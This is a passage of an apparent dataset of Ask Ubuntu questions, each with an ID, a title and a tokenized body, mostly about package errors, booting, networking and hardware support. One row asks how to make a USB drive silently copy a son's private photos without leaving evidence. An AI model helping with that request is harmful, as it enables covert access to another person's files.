) -- at this point i am at a loss ... i ca n't remove the offending packages , attempting to configure them seems to throw errors and attempting to finish their install seems to throw errors . and apt-get and the package manager app wo n't do anything - will not install any updates whatsoever , even security relevant ones , without first throwing this error . how do i make this go away ?
309340	multiple installation of netbeans	since we can install netbeans either using package manager or by using installer in netbeans website , i have these doubts . what will happen if both the above options are used ? if the 2nd method is used , is there any problem with the ide for finding jdk installed using package manager ? what are the problems if i update using 'check for updates ' option or install plugins from the ide installed using package manager ? is it requires root privilege for doing the above operations ?
309344	memory card reader no longer works	i 'm running ubuntu 12.10 on my dell inspiron 9400 laptop . the built-in 5-in-1 memory card reader used to work in linux , but now it wo n't detect my sd card . it still works in windows 7 though . i do n't know what the problem is . here is my lspci output : 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 01 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 )
309345	connect to mysql db tunneling with ssh using emma	i have tried using the mysql-workbench but it was too confusing , then i decided to use emma instead . i am trying to connect to my mysql db through ssh , but i do n't see that option when i try to make a new connection . any suggestions ? thanks ! ( i did try some researching but i could not find helpful results )
309347	ca n't mount sshfs via fstab , but can mount via cli . how do i get fstab to mount properly ?	i have setup password less ssh access and it works properly . i 'm unable to automatically mount my sshfs . this works : sshfs root @ 192.168.0.2 : /vmfs/volumes/esata01/ ~/vps however , when inserted into my fstab , my logged in user get this sshfs # root @ 192.168.0.2 : /vmfs/volumes/esata01/ /home/amahi/vps fuse defaults , idmap=user 0 0 i definitely have a permissions issue as here related to where the mount point is . it seems that when i do the raw fuse mount from the cli , i 'm doing it as the non-sudo logged in user . if i mount from fstab , it 's being done as sudo . if i run nautilus as sudo , i 'm able to get to the contents of the sshfs . any input is appreciated .
309358	error : need a repository as argument ?	how to fix this problem ? ! help me please ! ! mizo @ mizo-optiplex-gx270 : ~ $ sudo add-apt-repository ppa : upubuntu-com/icons2 error : need a repository as argument
309362	great wifi adapter	i 'm looking for a good reliable ( one that wont randomly become a brick ) long rang 1w+ wifi n adapter . i 've looked at alfa and have seen mixed reviews . if you know of any good ones please post them .
309366	can not install , screens keep flashing never load ubuntu 13.04	i 'm trying to install ubuntu in an old computer ( pentium4 , 1.5mhz , 512mb ram ) . after installing from a cd , the screen started to flash and ubuntu never loaded . i read that nvidia 's graphics card driver is not easy to install , so i decided to swap it out for an old hercules graphic card , and install again . the same thing happened , it never loaded and it kept flashing and trying to load ubuntu . then i tried : sudo vi /etc/default/grub but i could n't write or exit . starting it holding shift key , and with e adding `` nomodeset '' after `` quiet splash '' , and it load it but with no icon in the side not nor top menu , just empty . i do n't know how to continue . any suggestions ?
309369	does `` sudo apt-get '' installs 32bit or 64bit by default ?	ubuntu 13.04 64bit does `` sudo apt-get install '' installs 32bit or 64bit by default ? e.g . if i try does `` sudo apt-get install postgresql '' which version will it install ?
309370	switched to compiz for opengl on xubuntu 12.04 , now laptop screen does n't turn on after a suspend	i recently added the compizconfig settings manager to resolve screen tearing while watching full screen video ( it worked ! no more tearing ! ) but now every time i close the laptop screen and the system suspends , then open the laptop again , the screen stays black and does not turn on . i know that the system is turned on because i can hear the fan running and if i press ctrl+alt+f2 , type my login information , then sudo reboot the system will follow through and reboot . otherwise i have to do a hard reset to resolve the blank screen . the screen would turn on before installing compiz which is why i think it 's the culprit ( i was using the proprietary catalyst driver ) . is there something i can do to force the screen to turn on after/during a suspend-resume ?
309372	apic and lapic work with dual e5410 but not with dual e5420	i have a idataplex system with 2 dx340 system modules . one has dual xeon e5410 processors and the other board has dual e5420 processors . i can install esxi and ubuntu on the board with the e5410 processors without issue but neither will install on the board with the e5420 processors . i have to specify noapic and nolapic to install and run ubuntu and have not found an equivelent from esxi 5.1 to try that . there is no difference in the system boards and i have even swapped the processors between the boards and the problem follows the e5420 processors . trying to install esxi 4.0 ibm distribution got me some debug output after what i assume was a kernel panic . it is essentially saying the apicid of two of the cores is set to 0x00 . if i remove one processor this issue goes away . is this more a motherboard/bios issue ? if i use noapic/nolapic do i limit myself to using a single core of the 8 core system ?
309380	configure a specific launch of an application to use specific network connection ?	there 's a tool called torsocks that can be prepended to an application call ( ie , torsocks wget ) that will route all web calls of the application through a socks proxy . is there an equivalently `` simple '' way to do that for a specific network connection ? if i want to use p1p1 or ethn0 for this specific instance of this application only , for example .
309382	is is safe not to backup data on other partitions when performing a clean install ?	i have ubuntu 12.04 peacefuly coexisting with windows7 using dualboot . i would like to make a fresh installation of ubuntu 13.04 , which would replace ubuntu 12.04 . i have already backed up my files from the ubuntu partition , but i would like to avoid having to backup the windows data . is it safe ? according to my simplistic views of how the partition system works , as long as the disk drivers are working fine , there is very little that can go wrong .
309383	windows in not loading so trying to view file from ubuntu	http : //www.howtogeek.com/howto/windows-vista/use-ubuntu-live-cd-to-backup-files-from-your-dead-windows-computer/ using this link i am trying to open my windows drive . it says : try to open drive from computer icon.go-computer . then i try to open but it gives me error that unable to mount location . then using this site i wrote sudo /bin/bash then i have to mkdir.but it is giving error that can not create directory-read only files system . please help i need to access all my files .
309385	frostwire not opening	i have just donwloaded the application frostwire . i was trying to open it , but it just wo n't open . the icon does it 's flashing , and then it goes back to the normal background , no windows from that app at all . i checked the syslogs , and there is n't anything that i could find that had to do with it not opening . it 's not appearing on system monitor either . i do have openjdk 7 as it is required to run the program . any ideas ?
309389	can not run ubuntu 13.04 with acpi	i am trying to install 64 bit ubuntu 13.04 on a new system . i can only run ubuntu with `` acpi=off '' option . this applies to both attempt to run live usb and installed system . if i do not give `` acpi=off '' the system hangs after a few seconds to a minutes of starting up . for the moment it hangs syslog does not contain any acpi related messages . while booting with acpi on i am seeing the following error messages : acpi exception : ae_bad_parameter , thread 849680192 could not acquire mutex 0x1 as suggested in https : //wiki.ubuntu.com/debuggingacpi i tried “acpi=ht” and i see the same symptoms as without any acpi options . as it works with “acpi=off” and fails with “acpi=ht” i assume that the issue is in the acpi table parsing code itself , or perhaps the smp code . i am not sure what to do next . i am also not sure what are consequences of disabling acpi . i understand that i can not manage power but will it also affect my performance ? i assume so as apparently even hyperthreading does not work ( i checked that it does not ) . any advice will be highly appreciated . also if somebody can point me to a professional support that might be able to help me i would be happy to go for it . my system : clevo p570wm smbios 2.7 present . bios : vendor : american megatrends inc . version : 4.6.5 release date : 01/21/2013 linux 3.8.0-25-generic # 37-ubuntu smp thu jun 6 20:47:07 utc 2013 x86_64 x86_64 x86_64 gnu/linux cheers , michael
309390	how to install the yacy search engine	i want to install yacy search engine , but could not find a way to do this on ubuntu 13.04 . which steps do i need to perform to install yacy ?
309393	ca n't boot my laptop	my laptop was running both windows 7 home premium and ubuntu 12.10 . i decided to uninstall windows 7 with os-uninstaller . i did n't remember that my ubuntu was installed with wubi and when i uninstalled windows 7 , i also lost wubi . now i ca n't boot my laptop . i also thought i could install ubuntu on an usb , but my laptop is unable to boot from usb . how can i fix this ?
309395	how to find out what versions of a package from a launchpad repository are available with apt-get	if i go to the following web page https : //launchpad.net/ubuntu/+source/gedit/+publishinghistory there are a number of versions of gedit listed for the distribution `` raring '' ( 3.6.0-0ubuntu1 , 3.6.1-0ubuntu2 , 3.6.1-0ubuntu3 , and 3.6.2-0ubuntu1 ) , however , when i issue the command `` apt-cache -f showpkg gedit '' , the only version it lists is `` 3.6.2-0ubuntu1 '' . the `` synaptic package manager '' gui also only lists this version . how do i know what versions are available for download using the syntax explained in the question how to install specific ubuntu packages , with exact version ? by looking at the launchpad.net web page listed above ? my ultimate goal is to learn how to specify a specifc version of a package to install from an older release than what i have installed , but i ca n't even figure out how to install a different package version on the release i am already running . note , i am just using gedit as an example here because it is a package that i found to have multiple versions listed on launchpad.net for the release `` raring '' . the package i really want to install is https : //launchpad.net/ubuntu/+source/gnome-disk-utility/3.0.2-2ubuntu8/+build/3485589 , but it is also of a different release , so i decided to try the simpler gedit case which is of the same release . the latest gnome-disk-utility package has a very dumbed down user interface and many features removed ( although some new features have been added ) . i can manually install the old gnome-disk-utility version by downloading .deb files and installing them by double clicking , but i want to be able to do everything using apt-get .
309402	framebuffer imageviewer on ubuntu 12.04.2 virtual machine	i 'm trying to view some jpg 's on my ubuntu vmware server using fbi but i 'm getting `` /dev/fb0 : no such file or directory '' , which is valid since it does n't exist . using hwinfo -- frambuffer it lists the vesa framebuffer . is there a way to use this to display the jpg 's ? thanks
309405	fresh ubuntu 13.04 installed , login not working	having all sorts of issues with mini.iso , thought it 'd save me some time downloading ( slow internet ) but i simple do n't know what packages i need to get . anyways , my issue right now is logging into my desktop . i have the unity version of ubuntu 13.04 desktop . i had to manually grab xorg and xserver and lightdm , which 'works ' , but i can not log into the comp . what happens is the login screen after accepting my password , will just refresh and ask me to login again . i can log in in terminal ( ctrl+alt+f1 ) , but startx does not work . i get a window popup stating 'failed to load session gnome ' . i do n't think i have this package , and i can get it installed , but before i attempt it wanted to make sure gnome is required here ( dumb question sorry ) as it 's a 500mb download and will take me a few hours to get . i feel like i 'm going to just grab the normal .iso for 13.04 and go that route because i simply do n't ' know enough . this happened the last attempt i tried on this machine , except i was using kubuntu instead of unity .
309413	ubuntu wo n't boot after deleting a partition	i have a laptop that i run 2 oss on , ubuntu and chromium . they are on separate hard drives , and i physically swap the drives when i want to change the os . recently i wanted to install windows 7 instead of chromium , so i went ahead and began installing windows . i got to the screen where you select the disk/partition to install to , and i started deleting the old partitions . that 's when i realized that i had forgotten to switch the drives , and i was deleting ubuntu partitions . i only deleted one , it was the smaller partition ( ~200mb ) . i think this was the boot partition because now ubuntu wo n't boot . how can i get this partition back ?
309418	make an amazon ec2 instance ask for sudoing password	i 've launched an amazon ec2 instance of ubuntu server 12.04 and it 's all fine except , unlike with my local ubuntu , the ec2 instance never asks for any passwords when i 'm sudoing with the command line or become root . i tried passwd # asks for a new password , i supply one sudo -i # always makes me root right away passwd # asks for a new password , i supply one passwd ubuntu # asks for a new password , i supply one ( ubuntu is the default user the instance gets installed with . ) so far , event after reboots , i have n't noticed any difference , it still never asks for any passwords . it 's not a biggie but i guess i 've just used to how my local ubuntu works .
309421	xfce icons instead of tabs	for my taskbar programs are displayed like : ( symbol of chromium ) askubuntu.com i would like it as : symbol of chromium [ no titles ] askubuntu.com imagemagick man page like in cinnamon or windows 7 . no annoying long titles . displaying whichever window by title whenever i click on the symbol . i am running xfce xubuntu x64 tried a ton of different options in the settings manager , but can not locate it , if it is there . how would i go about doing this so my desktop does n't look like a complete mess ?
309422	recover hdd after creating usb installer	i just mistakingly used the wrong device to create a usb installer for ubuntu . i wanted to use my flash drive which was disk1 and ended up using disk2 which was my external hd . is there any way i can recover the information ? edit : well i 'm getting this : guess this means i 'm doomed right ? those are the biggest partitions which means they 're the ones i want to recover .
309423	how do i disable apport for my user account ?	every time my python program ends , i get the following : close failed in file object destructor : ioerror : [ errno 9 ] bad file descriptor error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 66 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes runtimeerror : sys.meta_path must be a list of import hooks apport presumes it wo n't be the cause of more problems in case something goes wrong . in my case however , apport seems to be a big problem . i 'm on a system where i 'm just one of many programmers , and i do n't have root privileges . so i 'd like to make my python program simply turn apport off , but not turn apport off globally . how do i disable apport for my user account ?
309427	what does `` ldconfig deferred processing now taking place '' mean ?	when i run apt-get with an option that installs packages , such as apt-get install firefox or apt-get dist-upgrade , the last line of output that i see is usually ldconfig deferred processing now taking place . what is going on here ? what is ldconfig , and what does it do ?
309429	how do i open a new terminal window to ssh into a new computer and execute commands ?	basically , i have a computer that i have to ssh into and pull up about 8 terminals to monitor various threads and log files . i would like to have a script from my build machine that can do this all for me . for example , if i want to watch the message queues , i 'd like to run something like this : gnome-terminal -- window-with-profile=nocloseprofile -e `` ssh root @ ip 'watch ipcs ' '' but the ssh command does n't seem to execute properly . i 've tried a dozen iterations of this , with no luck . here is a screen shot , if that helps . so basically , i want to have this be something i can put into a script , or even be something commandible , so given an ip address and a command to execute , i 'd like a new terminal window to open an ssh connection to that ip and execute the command . thanks in advance **edit i seem to be able to do this and execute most commands with the above command , but the watch command does not work over ssh so perhaps the sytax is n't the problem . is there a reason watch might not work here , where gnome-terminal -- window-with-profile=nocloseprofile -e 'ssh -x root @ $ ip `` tail -f /home/log/alog.log '' ' works fine ?
309436	uplay is stuck while trying to update	i installed assassin 's creed ii using playonlinux via wine . the install process completed , and i thought everything was ok , but it was n't . if i try to start the game , uplay starts and tries to update but already 3 hours have passed and nothing has changed , the program is still updating . please try to help me because i 'm very tired of using windows , and want to use ubuntu all the time .
309443	how to allow vms and host ping each other ?	i 'm trying to set up a few vms of ubuntu on my windows 7 machine . i need the machines to be able to ping each other and i would like to assign them a fqdn . the purpose of this project is to set up a hadoop cluster . i 'm following the instructions here . the fully qualified domain name ( fqdn ) for each host in your system , and which component ( s ) you wish to set up on which host . the ambari install wizard does not support using ip addresses . you can use hostname -f to check for the fqdn if you do not know it . i 've edited /etc/hosts : 127.0.0.1 localhost 10.0.0.1 base.localdomain base how can i assign fqdn to each vm , and make sure the machines can see each other ? i 'm using virtualbox . i do not have dns . my virtualbox is set up as nat and all defaults .
309444	does the ubuntu server iso support full disk encryption out of the box ?	does the ubuntu server iso support full disk encryption out of the box ? if no , what options do i have to do this out of the box with a stock iso now that alternate got nuked ?
309446	are all wifi connections in ubuntu treated as 'public ' automatically ?	i just booted up ubuntu for first time and connected to wifi . i 've come from windows where when you connect to wifi you choose to make it a 'home ' or 'public ' connection . i ca n't find this option anywhere so does ubuntu automatically treat all wifi connections as 'public ' . i use from a router in the stairwell of a small apartment block used by others , so when i was using windows op system i always made the wifi 'public'
309448	publish a file fails - can not access web link ( a file is no longer published )	i 've used ubuntu one in the past to publish files and share the file 's web link with colleagues . but no more . running ubuntu 12.04 i right click on a file ( a synchronized file with green check ) and go to the ubuntu menu . the only available selection is publish . i click publish and i receive a message on the screen `` a file is no longer published '' . if i right click on the file name now all the ubuntu menu selections are grayed out . when i go to one.ubuntu.com all the files are there ... i just can not publish and get the link . any help would be much appreciated . thanks , wayne
309458	is there a program to see channels used by wifi networks ( similar to vistumbler ) in ubuntu ?	i need to see the channels used by all wifi networks in range in order to improve my wifi connection by selecting the channel to be used by my modem ( a procedure related to the 'freebox ' modem ) . in windows there is vistumbler ( that i know of ) . what would be the equivalent in ubuntu ? edits after answers/comments : the name of my wireless is registered as eth1 ( not as wlan # ) - as confirmed after comments and chats what i want is a program that would display all wireless networks in range ( which any network app does ) and the channel used by each of them , like vistumbler does : i have an answer that seems satisfactory for now ( wicd ) - but please post more if there are other similar apps .
309461	how to disable ipv6 permanently ?	how can we disable ipv6 system wide via terminal commands ? i 've read editing /etc/modprobe.d/aliases and replacing : alias net-pf-10 ipv6 with : alias net-pf-10 off alias ipv6 off is this safe to apply and does it permanently disable ipv6 across reboots ?
309465	recover a text file from a pendrive knowing the filename	i had some text files i deleted acidentally . i want to recover them and i know the filename , but as they are all alike inside i ca n't use foremost or scalpel . the testdisk recovers the files but without the original filename so it 's useless . any help ?
309473	install clang 3.3 on ubuntu 12.04 and see unmet dependencies errors	ubuntu @ ubuntu-virtualbox : ~/downloads $ sudo apt-get install clang-3.3 clang-3.3-doc libclang-common-dev libclang-dev libclang1 libclang1-dbg libllvm-3.3-ocaml-dev libllvm3.3 libllvm3.3-dbg lldb-3.3 llvm-3.3 llvm-3.3-dev llvm-3.3-doc llvm-3.3-examples llvm-3.3-runtime reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : clang-3.3 : depends : libclang-common-dev ( = 1:3.3~svn181304-1~exp1 ) but 1:3.4~svn182727-1~exp1 is to be installed libclang-common-dev : depends : libllvm3.4 ( = 1:3.4~svn182727-1~exp1 ) but 1:3.4~svn183792-1~exp1 is to be installed e : unable to correct problems , you have held broken packages . question > what should i do to solve this problem ? the repository i have used is as follows : deb http : //llvm.org/apt/precise/ llvm-toolchain-precise main deb-src http : //llvm.org/apt/precise/ llvm-toolchain-precise main
309476	blank remote desktop 13.04	i am having an issue regarding remote desktop from a windows 7 machine . right now , the machine with ubuntu 13.04 has a cracked lcd and is a paperweight until i can replace it . my kvm switch is already using all the ports for two other machines . the issue begins after i install xrdp . i can remote just fine to the machine , however , when i connect it shows the default ubuntu desktop background with no interface except the mouse . i can not right click or anything . is there a setting i need to enable on the host machine or do i have to configure a user account specifically for remote desktop ?
309477	i would like to download multiple links in a directory	i apologize if i mispeak as i 'm pretty new to the tech world . basically i have a directory of server logs arranged accoring to the user 's ip address . i am looking for a way to download every log in a directory without having to do so one at a time . anyone have any ideas ? thanks in advanced
309483	program a flash drive to automatically copy a specific folder when plugged in ?	i 'm looking for a way to plug my flash drive into a computer and have it automatically copy all the files from a specific folder when it 's plugged in ? my son is being secretive about a party he went to , and i know he has pictures in his my documents folder , but he wo n't let me see them . is this possible ? and if so , can it be made to run in the background so there is no evidence of the copying ?
309484	batch download file from internet ?	say i want to download lot of image files from example.com/image001.jpg to example.com/image150.jpg . the example.com site have a lot of images from image000.jpg to image999.jpg , the images i want just from image001.jpg to image150.jpg ( 150 files ) . is there any command line or gui tool to do that ?
309494	how do you run a iso file ?	im trying to figure out on how to run an iso rather than mounting it but i have tried checking other sources but i either do n't get what it means or it 's the opposite . help on this would be awesome .
309496	changing directory color in cli	im having a hard time reading in blue colored text , whenever i work using cli , directory colors are by default blue or so , my co-worker changed it to blue . how can i easily change the directory color only ? like turn it to red or yellow , so it stands out and not hurt my eyes . blue text and black background makes me uncomfortable .
309497	what ubuntu iso do i use for my old powerbook g4 mac , 17 `` 1.33 with radeon	i already tried lubuntu , but that was no better than tiger since firefox is not supported and i cant get videos to play or sound on the computer . at least with mac os i have all that . i am really trying to get ubuntu on the power pc . i like how it works on my other devises . at the very end i just want to dual boot it or run it off a usb . powerpc 7447/7457altivec supported please help me get my old mac some functionality back . it was a great machine . tried ubuntu-12.04-desktop-powerpc.iso it installed lubuntu well its the desktop environment tried 13.04 no luck . well i just checked bios and its running saucy salamander . thank you
309498	unity launcher missing and terminal shortcut stopped working	when i restarted my ubuntu after it being updated , i found the unity launch bar was gone . i tried looking up several solutions online , blindly typing in the commands that others suggested , and i found after the umpteenth time rebooting after typing in another foreign command , i found i could n't even open up the terminal with the ctrl+alt+t shortcut either and i have no idea how to fix this . this was the last set of instructions i remember following before terminal stopped opening . install ccsm sudo apt-get install compizconfig-settings-manager and then run it in terminal ( ctrl+alt+t ) ccsm then search for `` ubuntu unity plugin '' . if it 's not checked , check it . if it is checked you may have another issue . try restarting compiz : kill -9pidof compiz` this will kill it , it should start up again , if it does n't , ctrl+alt+f2 and then type : sudo service lightdm restart to restart the window manager . go back to the terminal and run : unity -- reset
309500	problems with wubi installation on 12.10	rough google translation from portuguese : i downloaded the iso image of ubuntu 12.10 but when i install wubi i do n't have the option to install with the windows . i already tried to install manually , but when i restart my pc and choose ubuntu , it loads but after a while the screen is black and full of commands and this screen does not come out good . i want to install ubuntu with wubi but no option comes . what do i do ? original : bom baixei a imagem iso do ubuntu 12.10 mas quando vou instalar pelo wubi não tem a opção instalar junto ao windows já tentei instalar manualmente mas quando reinicio o pc e escolho o ubuntu ele carrega mas depois de um tempo a tela fica preta e cheia de comandos e dessa tela não sai bom quero instalar o ubuntu com o wubi mas a bendita opção não vem faço oque
309503	`` e : package 'gs ' has no installation candidate '' for mindtouch installation	i am following the instructions on this site installing mindtouch on ubuntu . at the part where i am asked to install dependencies packages , apt-get install html2ps poppler-utils html2text wv gs tidy links msttcorefonts cabextract mysql-server , i met with the error e : package 'gs ' has no installation candidate and i have no idea how to resolve it . i have since went to download relevant gs .deb file , get upgrade , installed synaptic package manager , but none of the steps helped . i am also pretty sure that my gs file is located under /usr/bin/ as i physically went to search for it . anyone can help me with this issue ? i would be very grateful . this is the relevant part : machine @ machine-proliant-microserver : /usr/bin $ sudo apt-get install html2ps poppler-utils html2text wv gs tidy links msttcorefonts cabextract mysql-server reading package lists ... done building dependency tree reading state information ... done note , selecting 'ttf-mscorefonts-installer ' instead of 'msttcorefonts' package gs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gs ' has no installation candidate** ps : i am using ubuntu 12.04 if this information helps .
309504	after installing ubuntu on my hp desktop , it fails to boot up , any ideas whats wrong ?	i made a ubuntu 13.04 64 bit usb drive , using that i installed ubuntu onto the 1 terabyte hdd in the machine , thus erasing my windows 8 installation ( i use ubuntu on all of my computers and have always done this ) . after it finished installing it told me to reboot , i clicked the button to reboot and it succesfully did that . the problem is when it is trying to boot up it does not seem to recognize my hdd as a place to boot from , it simply gives me an error stating that there are not valid boot devices . if i place a live usb in there though , it will boot fine off of that . or if i go into the boot menu , it does not display the hdd as an option to boot from . if it matters , i have reinstalled it twice now , and the ubuntu installer did recognize that ubuntu had been installed . system specs : amd 6 core 3.5 ghz processor 24 gigabytes of ram ( two 8 gb sticks and two 4 gb sticks ) 1 terabyte hdd 128 gigabyte ssd ( i was hoping to install ubuntu on this , but mount /home on my hdd , but by now i just want a computer which boots up : / )
309508	`` sample.lxc '' has an unknown provider type `` local '' error when bootstrapping	i installed juju as documented in the website , but i get the error `` sample.lxc '' has an unknown provider type `` local '' . i followed the whole process and i installed juju 1.11.0-precise-i386 .
309512	laptop internal mic not working ubuntu 12.04	i am running ubuntu 12.04 on a hp pavilion dv6 laptop . my laptop 's mic is detected , but does not pick up any sound . when i mute and then unmute it , a faint pop can be recorded by it , but the mic then gets no more info . i have set my audio profile in pulseaudio volume control ( pavucontrol ) to analog stereo duplex . i have tested and confirmed that the external mic port can record sound using my headphones as a microphone . i found out that my mic is broken , there is not an ubuntu problem . thanks for the help .
309514	why am i running 3.2.0-32 ?	i am running xubuntu 12.04 lts : cat /etc/issue ubuntu 12.04.2 lts \n \l when i do uname -a i have : linux tolede 3.2.0-32-generic # 51-ubuntu smp wed sep 26 21:33:09 utc 2012 x86_64 x86_64 x86_64 gnu/linux according to the release notes , it should be 3.5.0.23-35 : https : //wiki.ubuntu.com/precisepangolin/releasenotes/xubuntu i did the automatic update a few days ago . why am i not running the lastest version ?
309515	converting from .wmv to .mp4	i want to convert some of my videos from .wmv to .mp4 . not only that , i want to make the size of my videos shorter . can anyone recommend me any software ? ( ubuntu 12.4 + ram 1 gb ) i will be really grateful ...
309521	empathy will not authorize facebook account	short and sweet : i can not get empathy to add facebook as an account . at all . it asks me to log into facebook ( the facebookname @ chat.facebook.com will not work here , i tried . comes back as invalid , and yes i used the 'url ' username ) in a chrome browser ( even had firefox as default when attempting this , same thing occured ) , and all i get is 'success warning : treat the above url like your password ' or something close . and account settings still 'waits ' for verification from facebook . anyone else fix this issue yet ? i 've disabled secure browsing , account login notifications , logged out , removed ubuntu app from facebook . otherwise i 'll just grab another chat for ubuntu .
309522	setup an intranet website	i am working on a database driven website and want to test it using the lan available to me . how do i host a website ? ( static pages will also do ) i tried using php and it works on my system but not on other systems connected on the lan . i am open to hosting pages via any language . note that i do n't want to host a website on the internet . i am aware about the ubuntu server edition , and i am using 12.04 lts .
309523	no plugin on cacti 0.8.8a	i already follow the step on how do i install cacti ? , and install cacti version 0.8.8a on ubuntu 12.10 successfully , but no plugins installed and no file on /usr/local/share/cacti/plugins and /usr/share/cacti/site/plugins . how to install plugins for cacti version 0.8.8a on ubuntu 12.10 ?
309525	when using skype all other audio is muted	as the title says , whenever i use skype all other audio on my computer is muted . as well as that , if sound is playing from anything else and i try and make a skype call , it wo n't let me .
309527	how to package installed packages ?	is there anyway to package the installed software on the system ? i mean without going to/var/cache/apt.. and without downloading anything else , can i use a dpkg command to make a packages from all installed software on my system ? so i can take those packages , put them on a cd , and install them on another system without grabbing files from the cache or using aptoncd . thanks .
309532	error : brokencount > 0	i am getting the following error in the top menu bar : an error occurred . please run the package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'error : brokencount > 0 ' . this usually means that your installed packages have unmet dependencies . how do i solve this problem ?
309533	unmet dependencies samba	seems to be a pretty common problem , and i 've followed the guides in order to at least do updates around the problem , but before i do any more blind guessing , i 'm asking the community for reasons ( if not solutions ) and/or if anything similar has happened recently ( june 2013 ) to anyone else . basically , i 'm getting this error when i do an update ( whether terminal or through update manager ) : the following packages have unmet dependencies : samba : depends : samba-common ( = 2:3.6.3-2ubuntu2.5 ) but 2:3.6.3-2ubuntu2.6 is installed depends : libwbclient0 ( = 2:3.6.3-2ubuntu2.5 ) but 2:3.6.3-2ubuntu2.6 is installed depends : upstart-job but it is a virtual package i 've ran the -f install , and even -f upgrade , and still this . like i 've said , the closest i 've gotten is to update other packages and software around this error , but this persists . so , why/how does this happen in the first place ? any known solutions to fix this ? a lot seem to have multiple steps , but which step worked , or was it the succession . again , a solution would be great , but also just trying to learn what 's going on . any and all info is helpful , thanks ! ( ubuntu 12.04 64 ) trying to manually install i get this output ( in fact i get this output pretty much all the time ) : jesse @ funbox : ~ $ sudo apt-get install samba=2:3.6.3-2ubuntu2.6 reading package lists ... done building dependency tree reading state information ... done suggested packages : openbsd-inetd inet-superserver smbldap-tools ldb-tools ctdb the following packages will be upgraded : samba 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/8,046 kb of archives . after this operation , 0 b of additional disk space will be used . dpkg : dependency problems prevent configuration of samba : samba depends on samba-common ( = 2:3.6.3-2ubuntu2.5 ) ; however : version of samba-common on system is 2:3.6.3-2ubuntu2.6 . samba depends on libwbclient0 ( = 2:3.6.3-2ubuntu2.5 ) ; however : version of libwbclient0 on system is 2:3.6.3-2ubuntu2.6 . dpkg : error processing samba ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : samba e : sub-process /usr/bin/dpkg returned an error code ( 1 )
309538	can not modify files in /root	i 'm trying to modify files in the /root folder but i ca n't because i do n't have permission . i do n't understand what is happening because i thought i 'm logged in with the root but the name is just different . i ca n't even add a new file , for example i 'm trying to add a text file to the `` www '' folder to try and add a php file to run in apache but i ca n't add a file . however when i access the terminal and work with sudo it works fine but i want to do it the normal way . the question here : how to grant my user full root privileges ? ( because i want to add and edit the `` www '' folder ) i 'm supposed to be the root but my user directory is not in the root it is in the home directory : ( what 's wrong ? ! ! !
309546	stuck at logo screen while booting	i have ubuntu installed on a gateway nv53a laptop with windows 7 removed , and recently when i 've tried to start the computer , it gets stuck at the logo screen that says `` ubuntu '' with the progress bar lights . i recently upgraded to 13.04 . i 'm able to start by going to advanced options in the grub menu and then selecting recovery mode and then hitting f , but i have to do this each time i start . it also seems like it does n't work as well this way .
309551	how to exclude some installed software using remastersys	i am preparing a distributable iso by using remastersys 3.0.4-1 with `` dist '' option i dont wish to include some installed software in my output iso image , is it possible ? i wish to exclude remastersys software in my output iso please see below picture i would appreciate your help
309553	any way to back up a remote host with rsync without opening up for root access on either end ?	i 'm setting up a vps that 'll host a couple of sites , and i 'd like to back up everything to another host which has a nice massive zfs , allowing me to snapshot frequently . with the knowledge i have atm , i only see rsync as a solution since it does delta backups with the -c flag , pretty necessary since this vps has a limited bandwidth and potentially a quite large dataset , so transmitting everything one or several times a day is n't feasible . on the other hand , that means that if i need to properly preserve permissions and back up everything , including stuff that 's only readable by root ( such as ssl certificates ) , i need to enable authkey ssh root logins on either one of the hosts ( and push or pull backups accordingly ) . and i 'd really like to avoid that . or do i need to do that ? is there some trick that you know of that would allow me to run some cronjob on the vps and push out differential backup data to my other host without having to compromise security yet still be able to back up all files and preserve their permissions and ownerships ? i guess a last resort could be to set up a vm on the zfs host only for this purpose , enable password-less ssh root logins on a non-standard port inside it , make sure its disk image is on zfs ( or is a zvol ) and then push the backup files to it . but damn , that seems clunky , it would be a hassle to set up , and it 'd eat 